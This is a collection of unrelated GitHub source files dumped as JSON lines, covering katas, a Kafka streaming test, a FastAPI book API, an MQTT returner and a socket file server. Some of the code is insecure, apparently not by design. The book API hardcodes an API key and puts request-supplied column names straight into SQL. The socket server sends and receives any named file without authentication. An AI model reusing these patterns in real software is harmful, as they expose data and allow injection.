[month, year, event_date, monthlyCal,\n NameOfTheWeekDay, weekNumberInMonth, event]\n monthlyCal = self.grabNonRecurringEvent(infoNeeded)\n\n if len(self.reccuringEvents) > 0:\n monthlyCal = self.addRecurringEvents(month, year, monthlyCal)\n\n return monthlyCal\n\n def grabNonRecurringEvent(self, infoNeeded):\n month = infoNeeded[0]\n year = infoNeeded[1]\n event_date = infoNeeded[2]\n monthlyCal = infoNeeded[3]\n NameOfTheWeekDay = infoNeeded[4]\n weekNumberInMonth = infoNeeded[5]\n event = infoNeeded[6]\n if event_date['month'] == month and event_date['year'] == year:\n # we Know we are on the same month and same year\n\n # check if event 1 exist\n if 1 in monthlyCal[weekNumberInMonth][NameOfTheWeekDay]:\n # if it does find how many events that have been created\n count = 0\n for idx in \\\n monthlyCal[weekNumberInMonth][NameOfTheWeekDay]:\n count += 1\n monthlyCal[weekNumberInMonth][NameOfTheWeekDay][count] = event\n else:\n # if it doent then we need to create it\n monthlyCal[weekNumberInMonth][NameOfTheWeekDay][1] = event\n return monthlyCal\n\n def numberOfTimesDayisInMOnth(self, days, dayOfweek):\n howManyTimesDayOfWeekIsInMonth = 0\n\n theDaysThatMatch = []\n for number in range(days[1]):\n dayNumber = (calendar.weekday(\n self.year, self.month, number+1)+1) % 7\n week = [\n 'Sunday', \"Monday\", \"Tuesday\", \"Wednesday\",\n \"Thursday\", \"Friday\", \"Saturday\"\n ]\n\n if week[dayNumber] == dayOfweek:\n theDaysThatMatch.append(number+1)\n howManyTimesDayOfWeekIsInMonth += 1\n\n return howManyTimesDayOfWeekIsInMonth, theDaysThatMatch\n\n def addRecurringEvents(self, month, year, monthlyCal):\n return self.reccuringEventsForMonth(month, year, monthlyCal)\n","repo_name":"payneal/Programming-Katas","sub_path":"Python_TDD_Katas/calendar/calender.py","file_name":"calender.py","file_ext":"py","file_size_in_byte":9792,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"20107855305","text":"import sys, os, re\nimport json\n\nfrom pyspark import SparkContext, SparkConf\nfrom pyspark.streaming import StreamingContext\nfrom pyspark.streaming.kafka import KafkaUtils, OffsetRange, TopicAndPartition\n\n# 10초마다 데이터 처리 \nPERIOD=10\nBROKERS='localhost:9092'\nTOPIC='flight_delay_classification_request'\n\nconf = SparkConf().set(\"spark.default.parallelism\", 1)\n# sc = SparkContext(appName = \"Agile Data Science: PySpark Streaming 'Hello, World!'\", conf=conf)\nssc = StreamingContext(sc, PERIOD)\n\nstream = KafkaUtils.createDirectStream(\n ssc,\n [TOPIC],\n {\n \"metadata.broker.list\": BROKERS,\n \"group.id\": \"0\",\n }\n)\n\n# JSON 메시지 파싱하고 결과 객체를 출력\nobject_stream = stream.map(lambda x: json.loads(x[1]))\nobject_stream.pprint()\n\nssc.start()\n","repo_name":"wikibook/agile-data-science","sub_path":"ch08/streaming_test.py","file_name":"streaming_test.py","file_ext":"py","file_size_in_byte":776,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"30638347280","text":"\"\"\"\nSolution for 718. Maximum Length of Repeated Subarray\nhttps://leetcode.com/problems/maximum-length-of-repeated-subarray/\n\"\"\"\n\nclass Solution:\n \"\"\"\n Runtime: 2648 ms, faster than 76.33% of Python3 online submissions for Maximum Length of\n Repeated Subarray.\n Memory Usage: 38.3 MB, less than 66.49% of Python3 online submissions for Maximum Length of\n Repeated Subarray.\n \"\"\"\n def findLength(self, A, B):\n \"\"\"\n Given two integer arrays A and B, return the maximum length of an subarray that appears in\n both arrays.\n\n Example 1:\n\n Input:\n A: [1,2,3,2,1]\n B: [3,2,1,4,7]\n Output: 3\n Explanation:\n The repeated subarray with maximum length is [3, 2, 1].\n\n Args:\n A: list to find common subarray from\n B: list to find common subarray from\n\n Returns:\n int: the maximum length of the common array\n \"\"\"\n memo = [[0] * (len(B) + 1) for _ in range(len(A) + 1)]\n for i in range(len(A) - 1, -1, -1):\n for j in range(len(B) - 1, -1, -1):\n if A[i] == B[j]:\n memo[i][j] = memo[i + 1][j + 1] + 1\n\n return max(max(row) for row in memo)\n","repo_name":"KKosukeee/CodingQuestions","sub_path":"LeetCode/718_maximum_length_of_repeated_subarray.py","file_name":"718_maximum_length_of_repeated_subarray.py","file_ext":"py","file_size_in_byte":1253,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"11288889453","text":"from typing import Optional\r\nfrom fastapi import FastAPI, Request, HTTPException\r\nfrom sqlite3 import Error, connect, version\r\n\r\n\r\ndef create_connection(db_file):\r\n \"\"\" create a database connection to the SQLite database\r\n specified by db_file\r\n :param db_file: database file\r\n :return: Connection object or None\r\n \"\"\"\r\n conn = None\r\n try:\r\n conn = connect(db_file, check_same_thread=False)\r\n except Error as e:\r\n print(e)\r\n\r\n return conn\r\n\r\n\r\ndef create_table_books():\r\n sql_script_make_books = \"\"\"\r\n CREATE TABLE IF NOT EXISTS books (\r\n title text NOT NULL,\r\n isbn13 text PRIMARY KEY,\r\n details text,\r\n publisher text,\r\n year integer,\r\n price real\r\n );\r\n \"\"\"\r\n try:\r\n c = conn.cursor()\r\n c.execute(sql_script_make_books)\r\n c.close()\r\n except Error as e:\r\n print(e)\r\n\r\n\r\ndef create_book(book):\r\n \"\"\"\r\n Create a new book\r\n :param conn:\r\n :param book:\r\n \"\"\"\r\n script = ''' INSERT INTO books(title, isbn13, details, publisher, year, price) VALUES(?,?,?,?,?,?)'''\r\n c = conn.cursor()\r\n c.execute(script, book)\r\n conn.commit()\r\n c.close()\r\n\r\n\r\ndef update_book(update_list, isbn13):\r\n \"\"\"\r\n update book\r\n :param conn:\r\n :param book:\r\n :param isbn13:\r\n \"\"\"\r\n c = conn.cursor()\r\n for key, value in update_list.items():\r\n c.execute('UPDATE books SET %s = ? WHERE isbn13 = ?' %\r\n key, [value] + [isbn13])\r\n conn.commit()\r\n c.close()\r\n\r\n\r\ndef delete_book(isbn13):\r\n \"\"\"\r\n Delete a book by isbn13\r\n :param conn: Connection to the SQLite database\r\n :param isbn13: isbn13\r\n :return:\r\n \"\"\"\r\n c = conn.cursor()\r\n c.execute('DELETE FROM books WHERE isbn13=?', (isbn13,))\r\n conn.commit()\r\n c.close()\r\n\r\n\r\ndef select_books():\r\n \"\"\"\r\n Query all rows in the tasks table\r\n :param conn: the Connection object\r\n :return:\r\n \"\"\"\r\n c = conn.cursor()\r\n c.execute(\"SELECT * FROM books\")\r\n\r\n rows = c.fetchall()\r\n c.close()\r\n\r\n return rows\r\n\r\n\r\ndef select_book_by_isbn13(isbn13):\r\n \"\"\"\r\n Query a book by isbn13\r\n :param conn: the Connection object\r\n :param isbn13:\r\n :return:\r\n \"\"\"\r\n c = conn.cursor()\r\n c.execute(\"SELECT * FROM books WHERE isbn13=?\", (isbn13,))\r\n\r\n row = c.fetchone()\r\n\r\n return row\r\n\r\n\r\napp = FastAPI()\r\nconn = create_connection('books.db')\r\napi_key = 'hK0iP5dL7bW3fP3y'\r\n\r\nif __name__ == '__main__':\r\n # test\r\n c = conn.cursor()\r\n c.execute(\"DROP TABLE IF EXISTS books;\")\r\n create_table_books()\r\n c.execute(\"DELETE FROM books;\")\r\n\r\n test_isbn13 = 12321321\r\n test_book = (\"hey\", test_isbn13, \"details1\", \"publisher2\", 2021, 15.00)\r\n\r\n create_book(test_book)\r\n print(select_book_by_isbn13(test_isbn13))\r\n\r\n update_book(('newbook', \"newdetail\", \"newpub\", 1999, 9999.99), test_isbn13)\r\n print(select_book_by_isbn13(test_isbn13))\r\n\r\n delete_book(test_isbn13)\r\n print(select_book_by_isbn13(test_isbn13))\r\n\r\n\r\nasync def api_key_check(request):\r\n try:\r\n if request.query_params[\"apikey\"] != api_key:\r\n raise HTTPException(401)\r\n except:\r\n raise HTTPException(401)\r\n\r\n\r\n@app.get(\"/books\")\r\nasync def select_books_app(request: Request):\r\n await api_key_check(request)\r\n books = select_books()\r\n temp = {\"total\": len(books), \"books\": books}\r\n print(temp)\r\n\r\n return temp\r\n\r\n\r\n@app.get(\"/books/{isbn13}\")\r\nasync def select_book_app(request: Request, isbn13: str):\r\n await api_key_check(request)\r\n\r\n book = select_book_by_isbn13(isbn13)\r\n print(book)\r\n return book\r\n\r\n\r\n@app.post(\"/books\")\r\nasync def create_book_app(request: Request):\r\n await api_key_check(request)\r\n data = await request.json()\r\n try:\r\n create_book(\r\n (data[\"title\"],\r\n data[\"isbn13\"],\r\n data[\"details\"],\r\n data[\"publisher\"],\r\n int(data[\"year\"]),\r\n float(data[\"price\"]),)\r\n )\r\n except:\r\n return {\r\n \"status\": 1,\r\n \"message\": \"Book already exists, use PUT to update\",\r\n }\r\n\r\n return {\r\n \"status\": 0,\r\n \"message\": \"Book added\",\r\n }\r\n\r\n\r\n@app.put(\"/books/{isbn13}\")\r\nasync def update_book_app(request: Request, isbn13: str):\r\n await api_key_check(request)\r\n\r\n data = await request.json()\r\n try:\r\n update_book(data, isbn13)\r\n except:\r\n return {\r\n \"status\": 1,\r\n \"message\": \"Error occured\",\r\n }\r\n\r\n return {\r\n \"status\": 0,\r\n \"message\": \"Book updated\",\r\n }\r\n\r\n\r\n@app.delete(\"/books/{isbn13}\")\r\nasync def delete_book_app(request: Request, isbn13: str):\r\n await api_key_check(request)\r\n\r\n try:\r\n delete_book(isbn13)\r\n except:\r\n return {\r\n \"status\": 1,\r\n \"message\": \"Error occured\",\r\n }\r\n\r\n return {\r\n \"status\": 0,\r\n \"message\": \"Book deleted\",\r\n }\r\n","repo_name":"whqkdhfh13/cmput401_api1","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5240,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"17755297064","text":"import python_ie221 as p1\nimport pickle\n \n#Read data\ndt = p1.ReadData('data\\Combined_News_DJIA.csv')\n\n#Preprocessing\npre = p1.PreProcessing()\n\npre.fully_preprocess(dt.data)\n\n#Processing\nprocess = p1.Processing(pre.x_train, pre.x_test, pre.y_train, pre.y_test)\nprocess.RandomForest()\nprocess.KNNClassifier()\nprocess.Naive()\nprocess.SVMLinearSVC()\n\n#Result\nresult = p1.Result(process)\nresult.full_score()\n\n##visualize\nvisual = p1.Visualization()\nvisual.result_visualization(pre.pre_data, result.List_score)\n\n#Save class contains models by pickle\nfilename = \"Model\"\noutfile = open(filename,'wb')\npickle.dump(process,outfile)\noutfile.close()\n\n#Load class contains models by pickle(Optional)\n#infile = open(filename,'rb')\n#class_model = pickle.load(infile)\n#infile.close()","repo_name":"PyProjectIE221/StockMarket-Prediction","sub_path":"main_code.py","file_name":"main_code.py","file_ext":"py","file_size_in_byte":770,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"2971632632","text":"import os\r\nimport socket\r\nimport sys\r\nfrom threading import Thread\r\n\r\nHOST = \"127.0.0.1\"\r\n#Enes Delibalta 160401058\r\nPORT=int(input(\"PORT giriniz\"))\r\n\r\n\r\ndef create_socket():\r\n try:\r\n global HOST\r\n global PORT\r\n global sd\r\n sd = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n except socket.error as e:\r\n print(\"Socket olusturma hatası\", str(e))\r\n\r\n\r\ndef bind_socket():\r\n try:\r\n global HOST\r\n global PORT\r\n global sd\r\n\r\n sd.bind((HOST, PORT))\r\n sd.listen(5)\r\n print(\"Port\", PORT, \"dinleniyor\")\r\n except socket.error as e:\r\n print(\"Soket olusturma hatası \", str(e), \"\\nTekrar deneniyor\")\r\n bind_socket()\r\n\r\n\r\ndef socket_accept():\r\n while True:\r\n conn, address = sd.accept()\r\n print(\"Baglantı saglandı Ip: \", address[0], \":\", address[1])\r\n try:\r\n Thread(target=send_data, args=(conn, address)).start()\r\n except:\r\n print(\"Hata\")\r\n\r\n\r\ndef handleLs(conn):\r\n datas = os.listdir()\r\n datas = [i+str(\"\\n\") for i in datas]\r\n \r\n size = str(len(datas))\r\n conn.send(str.encode(size))\r\n \r\n for d in datas:\r\n d = str(d)\r\n \r\n conn.send(str.encode(d))\r\n l = conn.recv(10)\r\n \r\n\r\n\r\ndef handleGet(conn, filename):\r\n how_many = conn.recv(20)\r\n conn.send(str.encode(\"ok\"))\r\n if how_many.decode(\"utf-8\") == \"$all_$\":\r\n path = os.getcwd()\r\n all_files = [f for f in os.listdir(path)\r\n if os.path.isfile(os.path.join(path, f))]\r\n ssize = len(all_files)\r\n conn.send(str.encode(str(ssize)))\r\n n = conn.recv(10)\r\n for a_file in all_files:\r\n conn.send(str.encode(str(a_file)))\r\n n = conn.recv(10)\r\n with open(str(a_file), \"rb\") as f:\r\n l = f.read(1024)\r\n while (l):\r\n conn.send(l)\r\n n = conn.recv(10)\r\n \r\n l = f.read(1024)\r\n conn.send(str.encode(\"$end$\"))\r\n else:\r\n cur_path = os.getcwd()\r\n if os.path.exists(filename):\r\n conn.send(str.encode(\"$present$\"))\r\n istry = conn.recv(20)\r\n if istry.decode(\"utf-8\") == \"ok\":\r\n with open(filename, \"rb\") as f:\r\n f = open(filename, 'rb')\r\n l = f.read(1024)\r\n while (l):\r\n conn.send(l)\r\n n = conn.recv(10)\r\n print('Sent ', repr(n))\r\n l = f.read(1024)\r\n \r\n conn.send(str.encode(\"$end$\"))\r\n f.close()\r\n else:\r\n conn.send(str.encode(\"böyle bir dosya yok\"))\r\n\r\n\r\ndef handlePut(conn, filename):\r\n how_many = conn.recv(20)\r\n conn.send(str.encode(\"ok\"))\r\n if how_many.decode(\"utf-8\") == \"$all$\":\r\n ssize = conn.recv(20)\r\n conn.send(str.encode(\"ok\"))\r\n for i in range(int(ssize)):\r\n fff_name = conn.recv(100)\r\n fff_name = fff_name.decode(\"utf-8\")\r\n conn.send(str.encode(\"ok\"))\r\n with open(fff_name, 'wb') as f:\r\n data = conn.recv(1024)\r\n while True:\r\n f.write(data)\r\n conn.send(str.encode(\"ok\"))\r\n data = conn.recv(1024)\r\n if data.decode(\"utf-8\") == \"$end$\":\r\n print(data.decode(\"utf-8\"))\r\n break\r\n else:\r\n with open(filename, 'wb') as f:\r\n data = conn.recv(1024)\r\n while True:\r\n f.write(data)\r\n conn.send(str.encode(\"ok\"))\r\n data = conn.recv(1024)\r\n if data.decode(\"utf-8\") == \"$end$\":\r\n print(data.decode(\"utf-8\"))\r\n break\r\n\r\n\r\ndef send_data(conn, a):\r\n send_dir = os.getcwd()\r\n conn.send(str.encode(str(send_dir)))\r\n while True:\r\n data = conn.recv(1024)\r\n data = data.decode(\"utf-8\")\r\n r_cmd = data.split(\" \")\r\n cmd = r_cmd[0]\r\n try:\r\n filename = r_cmd[1]\r\n except:\r\n pass\r\n if(cmd == \"ls\"):\r\n handleLs(conn)\r\n elif(cmd == \"get\"):\r\n handleGet(conn, filename)\r\n elif(cmd == \"put\"):\r\n handlePut(conn, filename)\r\n \r\n else:\r\n d = \"böyle bir komut yok.get, put veya ls kullan\"\r\n\r\n\r\ndef main():\r\n create_socket()\r\n bind_socket()\r\n socket_accept()\r\n\r\n\r\nmain()\r\n","repo_name":"nyucel/blm304","sub_path":"vize/160401058/sunucu.py","file_name":"sunucu.py","file_ext":"py","file_size_in_byte":4605,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"21"} +{"seq_id":"37495843236","text":"#Baekjoon 1011\nimport sys\ninput = sys.stdin.readline\n\nn = int(input())\nfor _ in range(n):\n x, y = map(int, input().split())\n \n count = 0\n dis = 1\n \n while x < y:\n count += 1\n x += dis\n if count % 2 == 0:\n dis += 1\n print(count)","repo_name":"meoldae/Algorithm","sub_path":"Boj/Python/Fly_Me_to_the_Alpha_Centauri.py","file_name":"Fly_Me_to_the_Alpha_Centauri.py","file_ext":"py","file_size_in_byte":280,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"9427040921","text":"from inventory_report.inventory import Inventory\nfrom datetime import date, datetime\nfrom operator import attrgetter\n\n\nclass SimpleReport:\n def add_inventory(self, inventory: Inventory) -> None:\n self.inventory = inventory.data\n\n def oldest_manufactured(self) -> str:\n \"\"\"\n https://siddharth1.medium.com/1-understanding-operator-itemgetter-attribute-or-operator-itemgetter-attribute-27e61754d1fa\n https://www.geeksforgeeks.org/ways-sort-list-dictionaries-values-python-using-itemgetter/\n \"\"\"\n oldest_item = min(self.inventory, key=attrgetter(\"manufacturing_date\"))\n oldest = oldest_item.manufacturing_date\n\n return oldest\n\n def closest_expiration(self) -> str:\n today = str(date.today())\n\n return min(\n product.expiration_date\n for product in self.inventory\n if str(datetime.strptime(product.expiration_date, \"%Y-%m-%d\"))\n > today\n )\n\n def largest_stock(self) -> str:\n largest: dict[str, int] = {}\n\n for product in self.inventory:\n if product.company_name not in largest:\n largest[product.company_name] = 1\n else:\n largest[product.company_name] += 1\n\n return max(largest, key=lambda item: largest[item])\n\n def generate(self) -> str:\n return (\n f\"Oldest manufacturing date: { self.oldest_manufactured() } \"\n f\"Closest expiration date: { self.closest_expiration() } \"\n f\"Company with the largest inventory: { self.largest_stock() } \"\n )\n","repo_name":"jonnoliveira/trybe-project-30-inventory-report","sub_path":"inventory_report/reports/simple_report.py","file_name":"simple_report.py","file_ext":"py","file_size_in_byte":1591,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"17057042913","text":"import datetime\nimport json\nimport logging\ntry:\n import paho.mqtt.client as mqtt\n HAS_MQTT = True\nexcept ImportError:\n HAS_MQTT = False\ntry:\n import ssl\n HAS_SSL = True\nexcept ImportError:\n HAS_SSL = False\n\nfrom salt.returners import get_returner_options\n\n\nlog = logging.getLogger(__name__)\n\n\n__virtualname__ = \"mqtt\"\n\n\ndef __virtual__():\n if not HAS_MQTT:\n return False, \"Could not import mqtt returner; \" \\\n \"paho mqtt client is not installed.\"\n if not HAS_SSL:\n return False, \"Could not import mqtt returner; \" \\\n \"ssl is not installed.\"\n\n return __virtualname__\n\n\ndef _get_options(ret=None):\n if log.isEnabledFor(logging.DEBUG):\n log.debug(\"Getting options for: {:}\".format(ret))\n\n defaults = {\n \"client_id\": \"\",\n \"clean_session\": None,\n \"protocol\": \"MQTTv311\",\n \"transport\": \"tcp\",\n \"host\": \"localhost\",\n \"port\": 1883,\n \"keepalive\": 60,\n \"bind_address\": \"\",\n \"username\": None,\n \"password\": None,\n \"tls\": {},\n \"proxy\": {},\n \"ws\": {},\n \"topic\": \"\",\n \"qos\": 0,\n \"retain\": False\n }\n\n attrs = {\n \"client_id\": \"client_id\",\n \"clean_session\": \"clean_session\",\n \"protocol\": \"protocol\",\n \"transport\": \"transport\",\n \"host\": \"host\",\n \"port\": \"port\",\n \"keepalive\": \"keepalive\",\n \"bind_address\": \"bind_address\",\n \"username\": \"username\",\n \"password\": \"password\",\n \"tls\": \"tls\",\n \"proxy\": \"proxy\",\n \"ws\": \"ws\",\n \"topic\": \"topic\",\n \"qos\": \"qos\",\n \"retain\": \"retain\"\n }\n\n options = get_returner_options(\n \"{:}_returner\".format(__virtualname__),\n ret,\n attrs,\n __salt__=__salt__,\n __opts__=__opts__,\n defaults=defaults\n )\n\n if log.isEnabledFor(logging.DEBUG):\n log.debug(\"Generated options: {:}\".format(options))\n\n return options\n\n\ndef _get_client_for(ret):\n\n # Get client instance from context if present\n client = __context__.get(__name__, None)\n\n # Create new instance if no existing found\n if client == None:\n options = _get_options(ret)\n log.info(\"Creating client instance with options: {:}\".format(options))\n\n client = mqtt.Client(\n client_id=options[\"client_id\"],\n clean_session=options[\"clean_session\"],\n protocol=getattr(mqtt, options[\"protocol\"], mqtt.MQTTv311), # Resolve MQTT constant\n transport=options[\"transport\"])\n setattr(client, \"metadata\", {})\n\n # Store options in metadata\n client.metadata[\"options\"] = options\n\n if options[\"username\"]:\n client.username_pw_set(options[\"username\"], password=options[\"password\"])\n\n # Setup TLS if defined\n if options[\"tls\"]:\n\n tls_kwargs = {}\n for key, val in options[\"tls\"].iteritems():\n\n # Resolve SSL constants\n if key in [\"cert_reqs\", \"tls_version\"]:\n tls_kwargs[key] = getattr(ssl, val)\n else:\n tls_kwargs[key] = val\n\n client.tls_set(**tls_kwargs)\n\n # Setup proxy if defined\n if options[\"proxy\"]:\n client.proxy_set(**options[\"proxy\"])\n\n # Setup WebSocket if defined\n if options[\"ws\"]:\n client.ws_set(**options[\"ws\"])\n\n # Register callback on connect\n def on_connect(client, userdata, flags, rc):\n if rc == mqtt.MQTT_ERR_SUCCESS:\n log.info(\"Client successfully connected to broker\")\n else:\n log.error(\"Client unable to connect to broker: {:}\".format(mqtt.error_string(rc)))\n\n client.on_connect = on_connect\n\n # Register callback on disconnect\n def on_disconnect(client, userdata, rc):\n log.warn(\"Client disconnected from broker: {:}\".format(mqtt.error_string(rc)))\n \n # Call disconnect to make sure 'is_connected' will return False\n rc = client.disconnect()\n log.info(\"Client disconnect result: {:}\".format(mqtt.error_string(rc)))\n\n client.on_disconnect = on_disconnect\n\n # Connect to the broker\n client.connect(options[\"host\"],\n port=options[\"port\"],\n keepalive=options[\"keepalive\"],\n bind_address=options[\"bind_address\"])\n\n # Run a client loop to make sure 'is_connected' will return True\n rc = client.loop()\n if rc != mqtt.MQTT_ERR_SUCCESS:\n log.error(\"Client loop call after initial connect failed: {:}\".format(mqtt.error_string(rc)))\n\n __context__[__name__] = client\n else:\n if log.isEnabledFor(logging.DEBUG):\n log.debug(\"Re-using client instance found in context\")\n\n # Check connection\n if not client.is_connected():\n log.warn(\"Client is no longer connected - attempting to reconnect\")\n\n # Attempt to reconnect\n rc = client.reconnect()\n log.info(\"Client reconnect result: {:}\".format(mqtt.error_string(rc)))\n\n # Run a client loop to make sure 'is_connected' will return True\n rc = client.loop()\n if rc != mqtt.MQTT_ERR_SUCCESS:\n log.error(\"Client loop call after reconnect failed: {:}\".format(mqtt.error_string(rc)))\n\n return client\n\n\ndef returner(ret):\n \"\"\"\n Return a result to MQTT.\n\n Example: salt '*' test.ping --return mqtt --return_kwargs '{\"host\": \"127.0.0.1\", \"port\": 1883}'\n \"\"\"\n\n returner_job(ret)\n\n\ndef returner_job(job):\n \"\"\"\n Return a Salt job result to MQTT.\n \"\"\"\n\n if not job or not job.get(\"jid\", None):\n log.warn(\"Skipping invalid job result: {:}\".format(job))\n\n return\n\n ret = job.get(\"return\", job.get(\"ret\", None))\n\n if not ret or not job.get(\"success\", True): # Default is success if not specified\n log.warn(\"Skipping unsuccessful job result with JID {:}: {:}\".format(job[\"jid\"], job))\n\n return\n\n namespace = job[\"fun\"].split(\".\")\n if isinstance(ret, dict) and \"_type\" in ret:\n\n # Only use module name when type is available\n returner_data(ret, namespace[0], **job)\n else:\n returner_data(ret, *namespace, **job)\n\n\ndef returner_data(data, *args, **kwargs):\n \"\"\"\n Return any arbitrary data structure to MQTT.\n \"\"\"\n\n if not data:\n log.debug(\"Skipping empty data result\")\n\n return\n\n client = _get_client_for(kwargs)\n options = client.metadata[\"options\"]\n\n if options[\"topic\"]:\n namespace = [options[\"topic\"]] + list(args)[1:]\n else:\n namespace = list(args)\n\n if isinstance(data, dict):\n payload = data\n\n # Append type to namespace if present and not already added\n if \"_type\" in data and not options[\"topic\"] and not data[\"_type\"] in namespace:\n namespace.append(data[\"_type\"])\n\n if not \"_stamp\" in data:\n data[\"_stamp\"] = datetime.datetime.utcnow().isoformat()\n\n elif isinstance(data, (list, set, tuple)):\n payload = {\n \"_stamp\": datetime.datetime.utcnow().isoformat(),\n \"values\": data\n }\n else:\n payload = {\n \"_stamp\": datetime.datetime.utcnow().isoformat(),\n \"value\": data\n }\n\n # Publish message\n topic = \"/\".join(namespace)\n res = client.publish(topic, json.dumps(payload, separators=(\",\", \":\")), qos=options[\"qos\"], retain=options[\"retain\"])\n if res.rc != mqtt.MQTT_ERR_SUCCESS:\n log.warn(\"Publish of message with topic '{:}' failed: {:}\".format(topic, mqtt.error_string(res.rc)))\n","repo_name":"autopi-io/autopi-core","sub_path":"src/salt/base/ext/_returners/mqtt_returner.py","file_name":"mqtt_returner.py","file_ext":"py","file_size_in_byte":7658,"program_lang":"python","lang":"en","doc_type":"code","stars":142,"dataset":"github-code","pt":"21"} +{"seq_id":"693146143","text":"import requests, os\nimport urllib.parse as up\nfrom sys import argv\nimport configparser\n\n\nconfig = configparser.ConfigParser()\nconfig.read(os.path.join(os.environ[\"HOME\"], \".wiki\", \"config\"))\nlocale = config[\"default\"][\"locale\"]\n\ndef main(users_query, *options):\n\t# wiki api\n\thost = 'https://{}.wikipedia.org/w/api.php?'.format(locale)\n\t# actions\n\tsearch = '&'.join([\n\t\t\t\t\t\t'action=opensearch',\n\t\t\t\t\t\t'search={}'.format(up.quote(users_query)),\n\t\t\t\t\t\t'prop=info',\n\t\t\t\t\t\t'format=json',\n\t\t\t\t\t\t'inprop=url'\n\t\t\t\t\t\t])\n\t# full url\n\turl = host + search\n\t# request\n\tresponce = requests.get(url)\n\tif (responce.status_code != requests.codes.ok):\n\t\tprint(\"Bad request (status code {})\".format(responce.status_code))\n\t\texit\n\n\tfor ans in responce.json()[2]:\n\t\tprint(ans)\n\nif __name__ == \"__main__\":\n\tmain(argv[1])\n","repo_name":"goncharoman/wiki","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":799,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"4439124565","text":"import numpy as np\nimport chainer\nimport chainer.links as L\nimport chainer.functions as F\n\nclass CNN(chainer.Chain):\n def __init__(self):\n # クラスの初期化\n super(CNN, self).__init__( \n conv1 = L.Convolution2D(1, 20, 4), # フィルター3 ボケを作ってる、入力、出力\n conv2 = L.Convolution2D(20, 30, 3), # フィルター4\n conv3 = L.Convolution2D(30, 40, 3),\n conv4 = L.Convolution2D(40, 50, 3),\n\n l1 = L.Linear(800, 500),\n l2 = L.Linear(500, 500),\n l3 = L.Linear(500, 10, initialW=np.zeros((10, 500), dtype=np.float32))\n )\n \n def __call__(self,x):\n # 順伝播の計算を行う関数\n # :param x: 入力値\n h = F.max_pooling_2d(F.dropout(F.relu(self.conv1(x))), 2)\n h = F.max_pooling_2d(F.dropout(F.relu(self.conv2(h))), 2)\n h = F.max_pooling_2d(F.dropout(F.relu(self.conv3(h))), 2)\n h = F.dropout(F.relu(self.conv4(h)))\n\n h = F.relu(self.l1(h))\n h = F.relu(self.l2(h))\n y = self.l3(h)\n return y","repo_name":"AtomScott/Crosslingual-audio-emotion-recognition-with-RAVDESS-and-XperDES","sub_path":"models/cnn.py","file_name":"cnn.py","file_ext":"py","file_size_in_byte":1113,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"36056816798","text":"#!/usr/bin/env python3\n\nimport site\nimport sys\n\nnew_sys_path = set(sys.path)\nfor path in site.getsitepackages():\n if path in new_sys_path:\n new_sys_path.remove(path)\nsys.path[0:] = new_sys_path\n\nimport os.path\n\nif __name__ == '__main__':\n # sys.path.append('/usr/lib/libreoffice/program')\n sys.path.append('/usr/lib/python3/dist-packages')\n import uno\n import unohelper\n sys.path.remove('/usr/lib/python3/dist-packages')\n sys.path.append(os.path.join(os.path.dirname(__file__),\n 'pythonpath'))\n\n\nimport argparse\nimport collections\nimport csv\nimport io\nimport logging\nimport os\nimport traceback\nimport urllib.request\n\nimport boto3\nimport uno # NOQA\nimport unohelper # NOQA\nfrom com.sun.star.sheet.CellFlags import VALUE\nfrom com.sun.star.sheet.CellFlags import DATETIME\nfrom com.sun.star.sheet.CellFlags import STRING\nfrom com.sun.star.sheet.CellFlags import ANNOTATION\nfrom com.sun.star.sheet.CellFlags import FORMULA\nfrom com.sun.star.sheet.CellFlags import HARDATTR\nfrom com.sun.star.sheet.CellFlags import STYLES\nfrom com.sun.star.sheet.CellFlags import OBJECTS\nfrom com.sun.star.sheet.CellFlags import EDITATTR\nfrom com.sun.star.sheet.CellFlags import FORMATTED\nfrom com.sun.star.task import XJob\nfrom com.sun.star.container import NoSuchElementException\nfrom com.sun.star.awt.FontWeight import BOLD\n\nBOOTSTRAP_REGION = 'us-east-1'\n\nALL_CELL_FLAGS = (VALUE | DATETIME | STRING | ANNOTATION | FORMULA |\n HARDATTR | STYLES | OBJECTS | EDITATTR | FORMATTED)\n\ng_ImplementationHelper = unohelper.ImplementationHelper()\n\n\ndef _get_or_create_sheet(doc, sheet_name):\n try:\n sheet = doc.Sheets.getByName(sheet_name)\n except NoSuchElementException:\n doc.Sheets.insertNewByName(sheet_name, doc.Sheets.Count)\n sheet = doc.Sheets.getByName(sheet_name)\n return sheet\n\n\nclass ImportEC2Pricing(unohelper.Base, XJob):\n EC2_PRICE_LIST_URL = ('https://pricing.us-east-1.amazonaws.com/offers/'\n 'v1.0/aws/AmazonEC2/current/index.csv')\n PRICE_LIST_HEADER_FIELDS = [\n 'FormatVersion', 'Disclaimer', 'Publication Date', 'Version',\n 'OfferCode']\n PRICING_SHEET_NAME = 'pricing data'\n PRICING_METADATA_SHEET_NAME = 'pricing metadata'\n NUM_DATA_ROWS_TO_LOAD = 1000\n\n def __init__(self, ctx):\n self.ctx = ctx\n\n def _get_pricing_metadata(self, pricing_csv_text):\n metadata = collections.OrderedDict()\n buf = io.StringIO()\n for i in range(len(self.PRICE_LIST_HEADER_FIELDS)):\n current_char = None\n while current_char != '\\n':\n current_char = pricing_csv_text.read(1)\n buf.write(current_char)\n\n buf.seek(0)\n csv_data = csv.reader(buf)\n for row, expected_header_field in zip(csv_data,\n self.PRICE_LIST_HEADER_FIELDS):\n if row[0] != expected_header_field:\n raise Exception('Incorrect header field detected: {}'.format(\n 